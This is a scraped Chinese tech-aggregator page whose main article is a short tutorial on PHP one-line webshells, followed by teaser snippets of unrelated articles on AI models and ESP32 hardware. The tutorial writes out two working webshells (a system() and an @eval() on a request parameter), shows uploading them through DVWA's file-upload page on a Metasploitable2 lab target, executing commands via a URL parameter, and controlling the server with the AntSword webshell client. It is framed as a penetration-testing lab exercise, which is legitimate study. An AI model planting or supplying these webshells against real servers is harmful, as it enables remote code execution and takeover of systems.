news 2026/5/30 23:53:02

php一句话木马(+蚁剑)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
php一句话木马(+蚁剑)

一.php一句话木马

一句话木马是一种极简的WebShell,常用于渗透测试中远程执行代码。它通常通过文件上传、代码注入等方式植入目标服务器。

二.实验环境(在同一局域网中)

靶机为Mstasploitable2-linux的DVWA

攻击方为kali,windows

三.构造shell.php

可以直接在桌面上创建文档

写入代码,新建文件shell.php

<?php system($_REQUEST ['cmd']);?>

四.主机查看IP,nmap

五.文件上传

得到靶机IP后,用火狐浏览器登录DVWA

http://靶机ip/dvwa/login.php

登录账号密码为:admin,password

到文件上传窗口

然后知道shell.php在服务器中的位置

六.远程控制

访问路径

http://靶机ip/dvwa/hackable/uploads/shell.php?cmd=ls

七.蚁剑控制

如果要用蚁剑控制的话,得把一句话木马改掉

改完后重新上传文件

<?php @eval($_REQUEST ['cmd']);?>

测试连接,连接成功后保存,可以进行操作了

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/28 15:09:01

Google发布300M EmbeddingGemma:移动端也能跑的AI嵌入模型

导语&#xff1a;Google DeepMind推出仅3亿参数的EmbeddingGemma模型&#xff0c;首次实现移动端设备上运行高性能文本嵌入任务&#xff0c;标志着轻量级AI模型在终端设备应用进入新阶段。 【免费下载链接】embeddinggemma-300m-qat-q8_0-unquantized 项目地址: https://ai.…

作者头像 李华
网站建设 2026/5/30 16:11:20

时光回溯:解锁记忆中的B站经典体验

在数字化浪潮奔涌的当下&#xff0c;你是否偶尔会怀念那个界面简洁、操作纯粹的B站&#xff1f;当现代设计不断刷新视觉体验&#xff0c;那份属于旧时光的温暖质感却愈发令人向往。现在&#xff0c;一款精心打造的工具为你打开通往记忆深处的大门&#xff0c;让经典B站界面重新…

作者头像 李华
网站建设 2026/5/28 15:26:36

ESP32麦克风采集与大模型响应整合指南

用ESP32打造会“听”懂的智能语音终端&#xff1a;从麦克风采集到大模型响应的完整实战你有没有想过&#xff0c;只花不到50块钱&#xff0c;就能做出一个能听、能理解、还会说话的小助手&#xff1f;它不仅能听清你说的话&#xff0c;还能调用像通义千问、ChatGLM这样的大模型…

作者头像 李华
网站建设 2026/5/28 15:09:07

PaddlePaddle + GPU算力组合推荐:最适合中文AI项目的开发环境

PaddlePaddle GPU算力组合推荐&#xff1a;最适合中文AI项目的开发环境 在当今AI项目开发中&#xff0c;一个常见痛点是&#xff1a;明明算法设计得不错&#xff0c;训练却慢如蜗牛&#xff1b;好不容易训完模型&#xff0c;部署时又遇到兼容性问题。尤其在处理中文任务时&…

作者头像 李华
网站建设 2026/5/28 15:09:08

ESP32 Arduino引脚映射深度剖析

深入理解ESP32引脚映射&#xff1a;从底层机制到实战避坑指南你有没有遇到过这样的情况&#xff1f;代码烧录失败&#xff0c;设备反复重启&#xff1b;ADC读数飘忽不定&#xff0c;像在“抽风”&#xff1b;触摸按键莫名其妙自己触发……这些问题的背后&#xff0c;往往不是程…

作者头像 李华
网站建设 2026/5/30 9:23:22

字节跳动Seed-OSS-36B大模型开源:512K超长上下文+灵活推理控制

字节跳动Seed-OSS-36B大模型开源&#xff1a;512K超长上下文灵活推理控制 【免费下载链接】Seed-OSS-36B-Base 项目地址: https://ai.gitcode.com/hf_mirrors/ByteDance-Seed/Seed-OSS-36B-Base 导语 字节跳动Seed团队正式开源360亿参数大语言模型Seed-OSS-36B系列&am…

作者头像 李华